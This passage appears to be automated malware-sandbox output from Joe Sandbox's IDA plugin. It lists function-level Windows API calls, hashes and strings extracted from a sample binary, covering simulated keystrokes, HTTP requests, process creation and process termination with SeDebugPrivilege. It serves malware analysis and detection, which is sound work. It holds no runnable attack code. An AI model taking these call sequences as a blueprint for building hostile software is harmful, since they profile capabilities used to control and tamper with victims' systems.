                                                  • Opcode ID: e4b690017544eb878a70f90ee4a07a2a7772120abc8772c1d672158a2045652d
                                                  • Instruction ID: c25d658fda85db0f27e70d0caaf4ad60c9544ad8a1888d012bce957ef8287a4b
                                                  • Opcode Fuzzy Hash: e4b690017544eb878a70f90ee4a07a2a7772120abc8772c1d672158a2045652d
                                                  • Instruction Fuzzy Hash: E6C127B1208305AFD710DF64C884A2BB7E9FF89348F00495DF9999B251DB71ED4ACB52
                                                  APIs
                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C57A6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: ArraySafeVartype
                                                  • String ID:
                                                  • API String ID: 1725837607-0
                                                  • Opcode ID: ad3e98088935d889e8e1e9939088d29ff4fba3d79d13b91ed3679d10a0580f0c
                                                  • Instruction ID: b6dfb1801383d98e28b512cfd2f0a74a319b8dd2be162a47fbe1b0546091ae99
                                                  • Opcode Fuzzy Hash: ad3e98088935d889e8e1e9939088d29ff4fba3d79d13b91ed3679d10a0580f0c
                                                  • Instruction Fuzzy Hash: 78B19E799042199FDB00DFA5E884BBEB7B4FF09322F204169E911E7241D734E9C9DBA4
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C511F0
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C51204
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00C5120B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50268,?,00000001), ref: 00C5121A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5122C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50268,?,00000001), ref: 00C51245
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50268,?,00000001), ref: 00C51257
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C5129C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C512B1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C50268,?,00000001), ref: 00C512BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: ea569301740fa39765d7eeef685fc52c046b1a7802dff56c000badb114bc9f61
                                                  • Instruction ID: d159a576f67de21f5b8ca19a06abe21f3c7594ba296df75265d72ef2b71e2675
                                                  • Opcode Fuzzy Hash: ea569301740fa39765d7eeef685fc52c046b1a7802dff56c000badb114bc9f61
                                                  • Instruction Fuzzy Hash: 6B319E79A00204FBDB109F94EC88F7D77ADEB54312F144229FD14C61A0D7B89EC48B64
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BFFAA6
                                                  • OleUninitialize.OLE32(?,00000000), ref: 00BFFB45
                                                  • UnregisterHotKey.USER32(?), ref: 00BFFC9C
                                                  • DestroyWindow.USER32(?), ref: 00C345D6
                                                  • FreeLibrary.KERNEL32(?), ref: 00C3463B
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C34668
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 3e87775056b9cab4682ec8a71f7bb9657d0142b07c1f8e987ad6775273bac749
                                                  • Instruction ID: 1521347488811c9b26038cb112bb28457b6df2a9924ca44956b9b38220904413
                                                  • Opcode Fuzzy Hash: 3e87775056b9cab4682ec8a71f7bb9657d0142b07c1f8e987ad6775273bac749
                                                  • Instruction Fuzzy Hash: 8EA15C30711216CFDB29EF14C995A79F3A4EF05710F1442EDEA0AAB262DB30AD5ADF50
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00C4A439), ref: 00C4A377
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 05cd2efeeb7d810f038aa6d005080f70ea09c1b83558c7b532d6d949d76d82df
                                                  • Instruction ID: 66c7aeb4f2de5f6bfb555c2aaecc2f187fea9f9479d2efd212a68a910cdfcf20
                                                  • Opcode Fuzzy Hash: 05cd2efeeb7d810f038aa6d005080f70ea09c1b83558c7b532d6d949d76d82df
                                                  • Instruction Fuzzy Hash: 8F91E531640606EBCB18DFB0C842BEEFBB4BF05304F508159E85DA7151DF70AA99EB91
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00BF2EAE
                                                    • Part of subcall function 00BF1DB3: GetClientRect.USER32(?,?), ref: 00BF1DDC
                                                    • Part of subcall function 00BF1DB3: GetWindowRect.USER32(?,?), ref: 00BF1E1D
                                                    • Part of subcall function 00BF1DB3: ScreenToClient.USER32(?,?), ref: 00BF1E45
                                                  • GetDC.USER32 ref: 00C2CD32
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C2CD45
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C2CD53
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C2CD68
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C2CD70
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C2CDFB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 5e15f2f10a6dcb3e3d945fa75fd4140ef675d23b86e6403ddd7de9fa99747f15
                                                  • Instruction ID: 333a64598268409e5d154404e9726bb8023415e8d5637a4221e2633edd46953f
                                                  • Opcode Fuzzy Hash: 5e15f2f10a6dcb3e3d945fa75fd4140ef675d23b86e6403ddd7de9fa99747f15
                                                  • Instruction Fuzzy Hash: FB719F31500209DFCF218F64D8C4BBE7BB5FF48350F24426AEE695B2A6C7318985DB60
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C61A50
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C61A7C
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C61ABE
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C61AD3
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C61AE0
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C61B10
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C61B57
                                                    • Part of subcall function 00C62483: GetLastError.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C62498
                                                    • Part of subcall function 00C62483: SetEvent.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C624AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                  • String ID:
                                                  • API String ID: 2603140658-3916222277
                                                  • Opcode ID: d87dfd220f311620fdfb936a790922ed3d300393267b1488d2ada05d5003e2b7
                                                  • Instruction ID: 87558202aece4274d2be7263def6550fe4bdf9010eeeb1909775fd955003ec66
                                                  • Opcode Fuzzy Hash: d87dfd220f311620fdfb936a790922ed3d300393267b1488d2ada05d5003e2b7
                                                  • Instruction Fuzzy Hash: 19418DB1501608BFEB258F51CCC5FBE7BACEF08355F08412AFE059A141E7709E419BA0
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C7F910), ref: 00C68D28
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C7F910), ref: 00C68D5C
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C68ED6
                                                  • SysFreeString.OLEAUT32(?), ref: 00C68F00
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 7e0990bfa85d2f6817479b2f340e83de9c4165d39b3624f51cda260cb54b277e
                                                  • Instruction ID: e6f231e7e4692cc19da7a0bc68a08400681e907eb85701de25ffb80302d16cde
                                                  • Opcode Fuzzy Hash: 7e0990bfa85d2f6817479b2f340e83de9c4165d39b3624f51cda260cb54b277e
                                                  • Instruction Fuzzy Hash: 34F14C75A00109EFCF24DF94C884EAEB7B9FF49314F108598F915AB251DB31AE46CB61
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6F6B5
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F848
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F86C
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F8AC
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F8CE
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C6FA4A
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C6FA7C
                                                  • CloseHandle.KERNEL32(?), ref: 00C6FAAB
                                                  • CloseHandle.KERNEL32(?), ref: 00C6FB22
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: b97de73f592679b9672bc2b39e1f643b4e3ae67cc8faaa730ae434d31f424051
                                                  • Instruction ID: 4ea44d07df4dcb26f0053efa4bb53b0ea985d5672849d5d10f39d415d86f541e
                                                  • Opcode Fuzzy Hash: b97de73f592679b9672bc2b39e1f643b4e3ae67cc8faaa730ae434d31f424051
                                                  • Instruction Fuzzy Hash: 81E1B0312043049FC724EF24D881B6EBBE1EF89354F14856DF9998B2A2CB31DD86DB52
                                                  APIs
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C53697,?), ref: 00C5468B
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C53697,?), ref: 00C546A4
                                                    • Part of subcall function 00C54A31: GetFileAttributesW.KERNEL32(?,00C5370B), ref: 00C54A32
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C54D40
                                                  • _wcscmp.LIBCMT ref: 00C54D5A
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C54D75
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: 13db39bf3e9ce6546dbb1f580dc85fcb2c7a5f42a41c55863a8f07471f2b2730
                                                  • Instruction ID: fd212e7bd17b3a5885c67a0db3857f7b1f3f35c57cea70c8fc94989996478b87
                                                  • Opcode Fuzzy Hash: 13db39bf3e9ce6546dbb1f580dc85fcb2c7a5f42a41c55863a8f07471f2b2730
                                                  • Instruction Fuzzy Hash: 735163B60083449BC728DBA4D8819DF73ECAF85355F00092EF689C3151EE70A6CCD76A
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C786FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 594de51fb63c4d09701fa5f92a5873a4bb5c696cf0134000702b0df9b7a147c5
                                                  • Instruction ID: 966be7c5c151aaa7b2e9f2c249864e0eb7caa8ff16dfdf3594894ac56f155064
                                                  • Opcode Fuzzy Hash: 594de51fb63c4d09701fa5f92a5873a4bb5c696cf0134000702b0df9b7a147c5
                                                  • Instruction Fuzzy Hash: 1A519330680244BEDB249B25CC8DFAD7BA5FB05750F608115FB2DE61E1CF71AA88DB51
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C2C2F7
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C2C319
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C2C331
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C2C34F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C2C370
                                                  • DestroyIcon.USER32(00000000), ref: 00C2C37F
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C2C39C
                                                  • DestroyIcon.USER32(?), ref: 00C2C3AB
                                                    • Part of subcall function 00C7A4AF: DeleteObject.GDI32(00000000), ref: 00C7A4E8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: 3df5a2a48e6099b7e0f190d06fbdfe9539a4cf1899f1bf9ba2349e8990d942e9
                                                  • Instruction ID: 0be2f4d57d12e5059dcc731bd1aa2037141eebfb974b02bf0b678956d30aac81
                                                  • Opcode Fuzzy Hash: 3df5a2a48e6099b7e0f190d06fbdfe9539a4cf1899f1bf9ba2349e8990d942e9
                                                  • Instruction Fuzzy Hash: 20518570A40209AFDB24DF65DC85BBE3BF5EB08310F104668FA16E72A0DB70AD85DB50
                                                  APIs
                                                    • Part of subcall function 00C4A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4A84C
                                                    • Part of subcall function 00C4A82C: GetCurrentThreadId.KERNEL32 ref: 00C4A853
                                                    • Part of subcall function 00C4A82C: AttachThreadInput.USER32(00000000,?,00C49683,?,00000001), ref: 00C4A85A
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4968E
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C496AB
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C496AE
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C496B7
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C496D5
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C496D8
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C496E1
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C496F8
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C496FB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: 129310ef99fd86901ef88438806158c9a9a21cf80bf32704e743a5c1b2a82840
                                                  • Instruction ID: ff66f1f14ba516a16d6b226b84600fca275ff1e3bf6f739892058d98651ce437
                                                  • Opcode Fuzzy Hash: 129310ef99fd86901ef88438806158c9a9a21cf80bf32704e743a5c1b2a82840
                                                  • Instruction Fuzzy Hash: F811CEB1950218BFF7106B719C89F6E3E2DEB4C760F510429F248AB0A0C9F25C91DAA4
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C4853C,00000B00,?,?), ref: 00C4892A
                                                  • HeapAlloc.KERNEL32(00000000,?,00C4853C,00000B00,?,?), ref: 00C48931
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C4853C,00000B00,?,?), ref: 00C48946
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00C4853C,00000B00,?,?), ref: 00C4894E
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C4853C,00000B00,?,?), ref: 00C48951
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C4853C,00000B00,?,?), ref: 00C48961
                                                  • GetCurrentProcess.KERNEL32(00C4853C,00000000,?,00C4853C,00000B00,?,?), ref: 00C48969
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C4853C,00000B00,?,?), ref: 00C4896C
                                                  • CreateThread.KERNEL32(00000000,00000000,00C48992,00000000,00000000,00000000), ref: 00C48986
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: d08fb48f33da4be41d1385a1a257c2deb24d2d0a180326622164027321a77a1e
                                                  • Instruction ID: bdc57817b5fc7a227d671c9af2bf3aa9b9dd31afff0a6ec139979f4a4fd6f3f6
                                                  • Opcode Fuzzy Hash: d08fb48f33da4be41d1385a1a257c2deb24d2d0a180326622164027321a77a1e
                                                  • Instruction Fuzzy Hash: 4F01AC75240304FFE710ABA5DC89F6F3B6CEB89711F404425FA09DB191CA7098418A20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: a96230cc333bee39b8cd739d38bd0a39f5e0588e2ee08ab167be2a9cdb8eda37
                                                  • Instruction ID: f25569066cc3ead2818f88ae52b663eb3e18cb798e2ccaa1fe8d22ce5d58b121
                                                  • Opcode Fuzzy Hash: a96230cc333bee39b8cd739d38bd0a39f5e0588e2ee08ab167be2a9cdb8eda37
                                                  • Instruction Fuzzy Hash: 20C19371A0021AAFDF20DF98D9C4BAEB7F9FF48314F148469E915A7280E7719E45CB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 3b949f43e3262da3b5016b4b397f15b3ef51ac5a231be33740b1711c370d72ce
                                                  • Instruction ID: d926a7757ac5352005c771afe219ad969a4948f4ad6feee5923d0970d06eb7b9
                                                  • Opcode Fuzzy Hash: 3b949f43e3262da3b5016b4b397f15b3ef51ac5a231be33740b1711c370d72ce
                                                  • Instruction Fuzzy Hash: 44918F71A00219EBDF34DFA5C888FAEB7B8EF45714F108169F915AB290D7709A45CFA0
                                                  APIs
                                                    • Part of subcall function 00C4710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?,?,00C47455), ref: 00C47127
                                                    • Part of subcall function 00C4710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47142
                                                    • Part of subcall function 00C4710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47150
                                                    • Part of subcall function 00C4710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?), ref: 00C47160
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C69806
                                                  • _memset.LIBCMT ref: 00C69813
                                                  • _memset.LIBCMT ref: 00C69956
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C69982
                                                  • CoTaskMemFree.OLE32(?), ref: 00C6998D
                                                  Strings
                                                  • NULL Pointer assignment, xrefs: 00C699DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 1300414916-2785691316
                                                  • Opcode ID: 4315741f6bc05a32f14cdef6d55f31960e5a45fc50dee53291b73a9fb4587872
                                                  • Instruction ID: d1a6dd98ac0d3b847fc1b2ce702744feeb95f9f577829e2fafd60123d7ff6804
                                                  • Opcode Fuzzy Hash: 4315741f6bc05a32f14cdef6d55f31960e5a45fc50dee53291b73a9fb4587872
                                                  • Instruction Fuzzy Hash: 29911671D00219EBDB20DFA5DC85EEEBBB9EF09310F10416AF519A7291DB719A44CFA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C76E24
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C76E38
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C76E52
                                                  • _wcscat.LIBCMT ref: 00C76EAD
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C76EC4
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C76EF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 7dd4374d775aeaacfff71fdd76429b97b30c61da3f7ce5f6da481b210fe99455
                                                  • Instruction ID: 46fc161cb3bdedddb73387c78760863af0abe5756a7ea0c17079663b592370b6
                                                  • Opcode Fuzzy Hash: 7dd4374d775aeaacfff71fdd76429b97b30c61da3f7ce5f6da481b210fe99455
                                                  • Instruction Fuzzy Hash: 0B41B174A00308AFDB219FA4CC85BEE77F8EF08754F10846AF598E7191D6719E848B60
                                                  APIs
                                                    • Part of subcall function 00C53C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C53C7A
                                                    • Part of subcall function 00C53C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C53C88
                                                    • Part of subcall function 00C53C55: CloseHandle.KERNEL32(00000000), ref: 00C53D52
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C6E9A4
                                                  • GetLastError.KERNEL32 ref: 00C6E9B7
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C6E9E6
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C6EA63
                                                  • GetLastError.KERNEL32(00000000), ref: 00C6EA6E
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C6EAA3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
